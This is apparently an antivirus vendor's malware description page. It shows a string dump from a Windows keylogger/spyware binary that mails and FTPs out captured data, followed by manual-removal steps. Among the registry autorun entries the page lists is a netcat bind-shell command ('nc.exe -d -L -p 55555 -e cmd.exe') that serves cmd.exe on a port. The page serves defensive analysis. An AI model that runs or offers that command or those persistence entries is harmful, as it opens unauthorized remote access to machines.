AUTH PLAIN %s
^%s^%s
AUTH LOGIN
LOGIN
--%s--
RCPT TO:<%s>
MAIL FROM:<%s>
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
portuguese-brazilian
ADVAPI32.DLL
kernel32.dll
UxTheme.dll
OLEACC.dll
passed a null parameter
DSO support routines
x509 certificate routines
error:lX:%s:%s:%s
ssl_sess_cert
ssl_cert
evp_pkey
x509_pkey
%s(%d): OpenSSL internal error, assertion failed: %s
lhash part of OpenSSL 1.0.0d 8 Feb 2011
Stack part of OpenSSL 1.0.0d 8 Feb 2011
supportedAlgorithms
crossCertificatePair
certificateRevocationList
cACertificate
userCertificate
userPassword
supportedApplicationContext
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
Big Number part of OpenSSL 1.0.0d 8 Feb 2011
ASN.1 part of OpenSSL 1.0.0d 8 Feb 2011
keylen <= sizeof key
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
len>=0 && len<=(int)sizeof(ctx->key)
j <= (int)sizeof(ctx->key)
keylength
keyfunc
EVP part of OpenSSL 1.0.0d 8 Feb 2011
.\crypto\pkcs12\p12_key.c
SHA1 part of OpenSSL 1.0.0d 8 Feb 2011
SHA-256 part of OpenSSL 1.0.0d 8 Feb 2011
SHA-512 part of OpenSSL 1.0.0d 8 Feb 2011
RSA part of OpenSSL 1.0.0d 8 Feb 2011
RAND part of OpenSSL 1.0.0d 8 Feb 2011
You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html
value.bag
value.safes
value.shkeybag
value.keybag
value.sdsicert
value.x509cert
value.other
cert_info
hexkey
rsa_keygen_pubexp
rsa_keygen_bits
NETAPI32.DLL
KERNEL32.DLL
value.single
value.set
PKCS8_PRIV_KEY_INFO
pkey
pkeyalg
enc_key
key_enc_algor
cert
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
d.other
X509_PUBKEY
public_key
.\crypto\asn1\x_pubkey.c
%d.%d.%d.%d/%d.%d.%d.%d
%*s%s:
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
name.relativename
name.fullname
certificateHold
Certificate Hold
cessationOfOperation
Cessation Of Operation
keyCompromise
Key Compromise
%*sOnly Attribute Certificates
%*sOnly CA Certificates
%*sOnly User Certificates
AUTHORITY_KEYID
keyid
X509_CERT_PAIR
X509_CERT_AUX
%d.%d.%d.%d
EC part of OpenSSL 1.0.0d 8 Feb 2011
ECDSA part of OpenSSL 1.0.0d 8 Feb 2011
.\crypto\ec\ec_key.c
DSA part of OpenSSL 1.0.0d 8 Feb 2011
Diffie-Hellman part of OpenSSL 1.0.0d 8 Feb 2011
.\crypto\dh\dh_key.c
\X
IP Address:%d.%d.%d.%d
URI:%s
DNS:%s
email:%s
EdiPartyName:
X400Name:
othername:
d.usernotice
d.cpsuri
CERTIFICATEPOLICIES
%*sExplicit Text: %s
%*sNumber%s:
%*sOrganization: %s
%*sCPS: %s
ddddddZ
ddddddZ
pubkey
priv_key
pub_key
EC_PRIVATEKEY
publicKey
privateKey
value.implicitlyCA
value.parameters
value.named_curve
p.char_two
p.prime
p.ppBasis
p.tpBasis
p.onBasis
p.other
.\crypto\evp\evp_pkey.c
ECDH part of OpenSSL 1.0.0d 8 Feb 2011
%'%1%=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
%s: (%d bit)
Public-Key
Private-Key
recommended-private-length: %d bits
public-key:
private-key:
PKCS#3 DH Public-Key
PKCS#3 DH Private-Key
Public-Key: (%d bit)
Private-Key: (%d bit)
X.509 part of OpenSSL 1.0.0d 8 Feb 2011
OPENSSL_ALLOW_PROXY_CERTS
x%s
%s - d:d:d%.*s %d%s
'() ,-./:=?
CONF part of OpenSSL 1.0.0d 8 Feb 2011
%*sPolicy Text: %s
%*scrlUrl:
EXTENDED_KEY_USAGE
%*sZone: %s, User:
.\crypto\x509v3\v3_akey.c
PKEY_USAGE_PERIOD
keyCertSign
Certificate Sign
keyAgreement
Key Agreement
keyEncipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
MD5 part of OpenSSL 1.0.0d 8 Feb 2011
PROXY_CERT_INFO_EXTENSION
D:/Projects/openssl-10.0d/ssl/certs
D:/Projects/openssl-10.0d/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_FILE
Basis Type: %s
Field Type: %s
ASN1 OID: %s
%s %s%lu (%s0x%lx)
%lu:%s:%s:%d:%s
CONF_def part of OpenSSL 1.0.0d 8 Feb 2011
[[%s]]
[%s] %s=%s
crlUrl
certStatus
certId
OCSP_CERTSTATUS
value.unknown
value.revoked
value.good
value.byKey
value.byName
reqCert
OCSP_CERTID
issuerKeyHash
certs
d.receiptList
d.allOrFirstTier
d.compressedData
d.authenticatedData
d.encryptedData
d.digestedData
d.envelopedData
d.signedData
d.ori
d.pwri
d.kekri
d.kari
d.ktri
CMS_PasswordRecipientInfo
keyDerivationAlgorithm
keyIdentifier
CMS_KeyAgreeRecipientInfo
recipientEncryptedKeys
CMS_OriginatorIdentifierOrKey
d.originatorKey
CMS_OriginatorPublicKey
CMS_RecipientEncryptedKey
CMS_KeyAgreeRecipientIdentifier
d.rKeyId
CMS_RecipientKeyIdentifier
CMS_OtherKeyAttribute
keyAttr
keyAttrId
CMS_KeyTransRecipientInfo
encryptedKey
keyEncryptionAlgorithm
certificates
d.crl
d.subjectKeyIdentifier
d.issuerAndSerialNumber
CMS_CertificateChoices
d.v2AttrCert
d.v1AttrCert
d.extendedCertificate
d.certificate
CMS_OtherCertificateFormat
otherCert
otherCertFormat
%s.dll
PEM part of OpenSSL 1.0.0d 8 Feb 2011
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
TRUSTED CERTIFICATE
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
CERTIFICATE
X509 CERTIFICATE
PRIVATE KEY
ENCRYPTED PRIVATE KEY
ANY PRIVATE KEY
.\crypto\evp\evp_key.c
nkey <= EVP_MAX_KEY_LENGTH
?456789:;<=
!"#$%&'()* ,-./0123
Verifying - %s
OpenSSL 1.0.0d 8 Feb 2011
%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s
EXPORT56
EXPORT40
EXPORT
.\ssl\ssl_cert.c
SSLv3 part of OpenSSL 1.0.0d 8 Feb 2011
TLSv1 part of OpenSSL 1.0.0d 8 Feb 2011
SSLv2 part of OpenSSL 1.0.0d 8 Feb 2011
s->session->master_key_length >= 0 && s->session->master_key_length < (int)sizeof(s->session->master_key)
wrong number of key bits
unsupported status type
unsupported ssl version
unsupported protocol
unsupported elliptic curve
unsupported digest type
unsupported compression algorithm
unsupported cipher
unknown pkey type
unknown key exchange type
unknown certificate type
unable to find public key parameters
unable to extract public key
unable to decode ecdh certs
unable to decode dh certs
tried to use unsupported cipher
tls peer did not respond with certificate list
tls client cert req with anon cipher
tlsv1 unsupported extension
tlsv1 certificate unobtainable
tlsv1 bad certificate status response
tlsv1 bad certificate hash value
tlsv1 alert export restriction
sslv3 alert unsupported certificate
sslv3 alert no certificate
sslv3 alert certificate unknown
sslv3 alert certificate revoked
sslv3 alert certificate expired
sslv3 alert bad certificate
signature for non signing certificate
reuse cert type not zero
reuse cert length not zero
public key not rsa
public key is not rsa
public key encrypt error
peer error unsupported certificate type
peer error no certificate
peer error certificate
peer did not return a certificate
null ssl method passed
no publickey
no private key assigned
no privatekey
Peer haven't sent GOST certificate, required for selected ciphersuite
no client cert received
no client cert method
no ciphers passed
no certificate specified
no certificate set
no certificate returned
no certificate assigned
no certificates returned
missing tmp rsa pkey
missing tmp rsa key
missing tmp ecdh key
missing tmp dh key
missing rsa signing cert
missing rsa encrypting cert
missing rsa certificate
missing export tmp rsa key
missing export tmp dh key
missing dsa signing cert
missing dh rsa cert
missing dh key
missing dh dsa cert
krb5 server rd_req (keytab perms?)
key arg too long
invalid ticket keys length
http request
https proxy request
error generating tmp rsa key
ecc cert should have sha1 signature
ecc cert should have rsa signature
ecc cert not for signing
ecc cert not for key agreement
cert length mismatch
certificate verify failed
bad ecc cert
bad dh pub key length
TLS1_SETUP_KEY_BLOCK
tls1_cert_verify_mac
SSL_VERIFY_CERT_CHAIN
SSL_use_RSAPrivateKey_file
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey
SSL_use_PrivateKey_file
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey
SSL_use_certificate_file
SSL_use_certificate_ASN1
SSL_use_certificate
SSL_SET_PKEY
SSL_SET_CERT
SSL_SESS_CERT_NEW
SSL_GET_SIGN_PKEY
SSL_GET_SERVER_SEND_CERT
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate
SSL_CTX_set_client_cert_engine
SSL_CTX_check_private_key
SSL_CHECK_SRVR_ECC_CERT_AND_ALG
SSL_check_private_key
SSL_CERT_NEW
SSL_CERT_INSTANTIATE
SSL_CERT_INST
SSL_CERT_DUP
SSL_add_file_cert_subjects_to_stack
SSL_add_dir_cert_subjects_to_stack
SSL3_SETUP_KEY_BLOCK
SSL3_SEND_SERVER_KEY_EXCHANGE
SSL3_SEND_SERVER_CERTIFICATE
SSL3_SEND_CLIENT_KEY_EXCHANGE
SSL3_SEND_CLIENT_CERTIFICATE
SSL3_SEND_CERTIFICATE_REQUEST
SSL3_OUTPUT_CERT_CHAIN
SSL3_GET_SERVER_CERTIFICATE
SSL3_GET_KEY_EXCHANGE
SSL3_GET_CLIENT_KEY_EXCHANGE
SSL3_GET_CLIENT_CERTIFICATE
SSL3_GET_CERT_VERIFY
SSL3_GET_CERT_STATUS
SSL3_GET_CERTIFICATE_REQUEST
SSL3_GENERATE_KEY_BLOCK
SSL3_CHECK_CERT_AND_ALGORITHM
SSL3_ADD_CERT_TO_BUF
SSL2_SET_CERTIFICATE
SSL2_GENERATE_KEY_MATERIAL
REQUEST_CERTIFICATE
GET_CLIENT_MASTER_KEY
DTLS1_SEND_SERVER_KEY_EXCHANGE
DTLS1_SEND_SERVER_CERTIFICATE
DTLS1_SEND_CLIENT_KEY_EXCHANGE
DTLS1_SEND_CLIENT_CERTIFICATE
DTLS1_SEND_CERTIFICATE_REQUEST
DTLS1_OUTPUT_CERT_CHAIN
DTLS1_ADD_CERT_TO_BUF
CLIENT_MASTER_KEY
CLIENT_CERTIFICATE
key expansion
client write key
server write key
c->iv_len <= (int)sizeof(s->session->key_arg)
s->s2->key_material_length <= sizeof s->s2->key_material
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
RST%d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
Obtained EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC index %d
Unsupported color conversion request
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
IDCT output block size %d not supported
Invalid component ID %d in SOS
Bogus message code %d
;Warning: highpass filter disabled. highpass frequency too small
http://lame.sf.net
3.99.5
Opera
?INTERNAL ERROR IN VBR NEW CODE, please send bug report
@INTERNAL ERROR IN VBR NEW CODE (986), please send bug report
INTERNAL ERROR IN VBR NEW CODE (1313), please send bug report
maxbits=%d usedbits=%d
hip: invalid layer %d
hip: error audio data exceeds framesize by %d bytes
hip: bitstream problem, resyncing skipping %d bytes...
Sorry, layer %d not supported
hip: Can't rewind stream by %d bits!
hip: Bogus region length (%d)
ADVAPI32.dll
q%D,3
QVisual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
%S#[k
?#%X.y
.\crypto\engine\eng_pkey.c
RSA PRIVATE KEY
DSA PRIVATE KEY
EC PRIVATE KEY
Load certs from files in a directory
%s%clx.%s%d
unsupported type
unsupported recpientinfo type
unsupported recipient type
unsupported kek algorithm
unsupported content type
signer certificate not found
private key does not match certificate
no public key
no private key
no msgsigdigest
no key or cert
no key
not supported for this key type
not key transport
msgsigdigest wrong length
msgsigdigest verification failure
msgsigdigest error
invalid key length
invalid encrypted key length
error setting key
error getting public key
certificate verify error
certificate has no keyid
certificate already present
CMS_SIGNERINFO_VERIFY_CERT
CMS_RecipientInfo_set0_pkey
CMS_RecipientInfo_set0_key
CMS_RecipientInfo_ktri_cert_cmp
cms_msgSigDigest_add1
CMS_GET0_CERTIFICATE_CHOICES
CMS_EncryptedData_set1_key
CMS_decrypt_set1_pkey
CMS_decrypt_set1_key
CMS_add1_recipient_cert
CMS_add0_recipient_key
CMS_add0_cert
unsupported requestorname type
no certificates in chain
error parsing url
PARSE_HTTP_LINE1
OCSP_parse_url
OCSP_cert_id_new
unimplemented public key method
invalid cmd number
invalid cmd name
failed loading public key
failed loading private key
cmd not executable
ENGINE_UNLOAD_KEY
ENGINE_load_ssl_client_cert
ENGINE_load_public_key
ENGINE_load_private_key
ENGINE_get_pkey_meth
ENGINE_get_pkey_asn1_meth
ENGINE_ctrl_cmd_string
ENGINE_ctrl_cmd
ENGINE_cmd_is_executable
unsupported version
unsupported md algorithm
invalid signer certificate purpose
ess signing certificate error
ess add signing cert error
TS_VERIFY_CERT
TS_TST_INFO_set_msg_imprint
TS_RESP_CTX_set_signer_cert
TS_RESP_CTX_set_certs
TS_REQ_set_msg_imprint
TS_MSG_IMPRINT_set_algo
TS_CHECK_SIGNING_CERTS
ESS_SIGNING_CERT_NEW_INIT
ESS_CERT_ID_NEW_INIT
ESS_ADD_SIGNING_CERT
functionality not supported
WIN32_JOINER
unsupported pkcs12 mode
key gen error
PKCS8_add_keyusage
PKCS12_PBE_keyivgen
PKCS12_newpass
PKCS12_MAKE_SHKEYBAG
PKCS12_MAKE_KEYBAG
PKCS12_key_gen_uni
PKCS12_key_gen_asc
PKCS12_add_localkeyid
unsupported option
unable to get issuer keyid
policy syntax not currently supported
operation not defined
no proxy cert policy language defined
no issuer certificate
extension setting not supported
V2I_EXTENDED_KEY_USAGE
V2I_AUTHORITY_KEYID
S2I_SKEY_ID
S2I_ASN1_SKEY_ID
R2I_CERTPOL
unsupported cipher type
unknown operation
unable to find certificate
signing not supported for this key type
operation not supported on this type
no recipient matches key
no recipient matches certificate
encryption not supported for this key type
decrypted key is wrong length
PKCS7_add_certificate
unsupported method
no port specified
no port defined
no accept port specified
broken pipe
BIO_get_port
ECDH_compute_key
data too large for key size
unsupported field
passed null parameter
not a supported NIST prime
missing private key
keys not set
invalid private key
PKEY_EC_SIGN
PKEY_EC_PARAMGEN
PKEY_EC_KEYGEN
PKEY_EC_DERIVE
PKEY_EC_CTRL_STR
PKEY_EC_CTRL
o2i_ECPublicKey
i2o_ECPublicKey
i2d_ECPrivateKey
EC_KEY_print_fp
EC_KEY_print
EC_KEY_new
EC_KEY_generate_key
EC_KEY_copy
EC_KEY_check_key
ECKEY_TYPE2PARAM
ECKEY_PUB_ENCODE
ECKEY_PUB_DECODE
ECKEY_PRIV_ENCODE
ECKEY_PRIV_DECODE
ECKEY_PARAM_DECODE
ECKEY_PARAM2TYPE
DO_EC_KEY_PRINT
d2i_ECPrivateKey
zlib not supported
wrong public key type
unsupported public key type
unsupported encryption algorithm
unsupported any defined by type
unknown public key type
unable to decode rsa private key
unable to decode rsa key
streaming not supported
private key header missing
digest and key type not supported
bad password read
X509_PKEY_new
i2d_RSA_PUBKEY
i2d_PublicKey
i2d_PrivateKey
i2d_EC_PUBKEY
i2d_DSA_PUBKEY
d2i_X509_PKEY
d2i_PublicKey
d2i_PrivateKey
d2i_AutoPrivateKey
unsupported algorithm
unknown key type
unable to get certs public key
public key encode error
public key decode error
no cert set for us to verify
method not supported
loading cert dir
key values mismatch
key type mismatch
cert already in hash table
cant check dh key
X509_verify_cert
X509_STORE_add_cert
X509_REQ_check_private_key
X509_PUBKEY_set
X509_PUBKEY_get
X509_load_cert_file
X509_load_cert_crl_file
X509_get_pubkey_parameters
X509_check_private_key
GET_CERT_BY_SUBJECT
ADD_CERT_DIR
PKEY_DSA_KEYGEN
PKEY_DSA_CTRL
unsupported key components
unsupported encryption
read key
public key no rsa
problems getting password
keyblob too short
keyblob header parse error
expecting public key blob
expecting private key blob
error converting private key
PEM_WRITE_PRIVATEKEY
PEM_READ_PRIVATEKEY
PEM_READ_BIO_PRIVATEKEY
PEM_PK8PKEY
PEM_F_PEM_WRITE_PKCS8PRIVATEKEY
DO_PK8PKEY_FP
DO_PK8PKEY
d2i_PKCS8PrivateKey_fp
d2i_PKCS8PrivateKey_bio
unsupported salt type
unsupported private key algorithm
unsupported prf
unsupported key size
unsupported key derivation function
unsupported keylength
unsuported number of rounds
private key encode error
private key decode error
operaton not initialized
operation not supported for this keytype
no operation set
no key set
keygen failure
invalid operation
expecting a ec key
expecting a ecdsa key
expecting a dsa key
expecting a dh key
expecting an rsa key
different key types
ctrl operation not implemented
command not supported
camellia key setup failed
bn pubkey error
bad key length
aes key setup failed
PKEY_SET_TYPE
PKCS5_v2_PBE_keyivgen
PKCS5_PBE_keyivgen
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover
EVP_PKEY_verify_init
EVP_PKEY_verify
EVP_PKEY_sign_init
EVP_PKEY_sign
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen
EVP_PKEY_new
EVP_PKEY_keygen_init
EVP_PKEY_keygen
EVP_PKEY_get1_RSA
EVP_PKEY_get1_EC_KEY
EVP_PKEY_GET1_ECDSA
EVP_PKEY_get1_DSA
EVP_PKEY_get1_DH
EVP_PKEY_encrypt_old
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt
EVP_PKEY_derive_set_peer
EVP_PKEY_derive_init
EVP_PKEY_derive
EVP_PKEY_decrypt_old
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_ctrl
EVP_PKEY_copy_parameters
EVP_PKEY2PKCS8_broken
EVP_PKCS82PKEY_BROKEN
EVP_PKCS82PKEY
EVP_CIPHER_CTX_set_key_length
ECKEY_PKEY2PKCS8
ECDSA_PKEY2PKCS8
DSA_PKEY2PKCS8
DSAPKEY2PKCS8
D2I_PKEY
CAMELLIA_INIT_KEY
AES_INIT_KEY
invalid public key
PKEY_DH_KEYGEN
PKEY_DH_DERIVE
GENERATE_KEY
COMPUTE_KEY
rsa operations not supported
key size too small
invalid keybits
illegal or unsupported padding mode
digest too big for rsa key
data too small for key size
RSA_generate_key
RSA_check_key
RSA_BUILTIN_KEYGEN
PKEY_RSA_VERIFYRECOVER
PKEY_RSA_SIGN
PKEY_RSA_CTRL_STR
PKEY_RSA_CTRL
.pp@0
aEÐ
 (#EÚ
ÚE<<0
RC2 part of OpenSSL 1.0.0d 8 Feb 2011
IDEA part of OpenSSL 1.0.0d 8 Feb 2011
libdes part of OpenSSL 1.0.0d 8 Feb 2011
DES part of OpenSSL 1.0.0d 8 Feb 2011
NETSCAPE_CERT_SEQUENCE
.\crypto\asn1\x_pkey.c
RegDeleteKeyW
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventA
UrlIsW
SHLWAPI.dll
PSAPI.DLL
WS2_32.dll
COMCTL32.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
FtpPutFileW
FtpCreateDirectoryW
FtpRemoveDirectoryW
FtpDeleteFileW
FtpSetCurrentDirectoryW
WININET.dll
MPR.dll
WINMM.dll
VERSION.dll
GetWindowsDirectoryW
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
KERNEL32.dll
UnregisterHotKey
RegisterHotKey
GetKeyNameTextW
MapVirtualKeyW
EnumWindows
EnumChildWindows
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
USER32.dll
GDI32.dll
COMDLG32.dll
ole32.dll
OLEAUT32.dll
PeekNamedPipe
.?AVECSmtp@@
zcÁ
K.uCi
%U|4_iOu
\cmd'
.GL#!
*%S_A
nÂzj
.yw(^
XV.Bh
.tC)l
{.CC5
E%C'[l
fJp%9s
F}.kd%
7.Mvv
4&.Ll
`;%S*Bb
18.yw
L[%x`
[.yg$4
%FqsO
-(0
`;%S"jb
%DqT,
PA
\StringFileInfo\lx\%s
%Y-%m-%d_%H-%M-%S.mp3
smtps.uol.com.br
*@uol.com.br
smtp.hotpop.com
*@hotpop.com
smtp.aim.com
*@aim.com
smtp.mail.yahoo.com
*@yahoo.com
smtp.gawab.com
*@gawab.com
smtp.comcast.net
*@comcast.net
smtp.ig.com.br
*@ig.com.br
mail.messagingengine.com
*@fastmail.fm
smtp.aol.com
*@aol.com
smtp.live.com
*@hotmail.com
smtp.googlemail.com
*@gmail.com;*@googlemail.com
smtp.mail.yahoo.com.br
*@yahoo.com.br
smtp.gmx.com
*@gmx.com;*@gmx.us
smtps.bol.com.br
*@bol.com.br
Shell32.dll
RICHED20.DLL
WAdvapi32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
@uxtheme.dll
@()<>,;:\"[]
Viewer.exe
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion
test335.txt
TEST408.txt
TEST408.txt/test335.txt
4.0.3
All Files (*.*)
\Install.exe
*.exe
(*.exe)
\TEST361.txt
@USER32.DLL
4.0.3
®key=
S.ICO
\WinInit.Ini
wininet.dll
netmsg.dll
%Y-%m-%d_%H-%M-%S.jpg
Chttp://
S%Y-%m-%d_%H-%M-%S
CWebcam_
Keys_
.html
comctl32.dll
DNSAPI.DLL
WTL_CmdBar_InternalAutoPopupMsg
WTL_CmdBar_InternalGetBarMsg
mscoree.dll
V*(%F@4 F7*
72.JA1'
[,'&"?4-
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nc.exe:1932
    %original file name%.exe:580
    virus.exe:1224
    regedit.exe:972

  2. Delete the original RemoteAdmin file.
  3. Delete or disinfect the following files created/modified by the RemoteAdmin:

    %Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\nc.exe (2025 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\foto.jpg (1568 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\wsetup.cmd (966 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\virus.exe (33520 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\INDEXH~1.TXT (122 bytes)
    %Documents and Settings%\All Users\Application Data\ITKVAP\ALW.01 (82 bytes)
    %Documents and Settings%\All Users\Application Data\ITKVAP\ALW.00 (2 bytes)
    %Documents and Settings%\All Users\Application Data\ITKVAP\ALW.exe (15021 bytes)
    %Documents and Settings%\All Users\Application Data\ITKVAP\ALW.02 (57 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "ALW Start" = "%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Update" = "c:\windows\system32\nc.exe -d -L -p 55555 -e cmd.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Virus" = "c:\windows\system32\virus.exe andrescruzvtj@hotmail.com"

  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now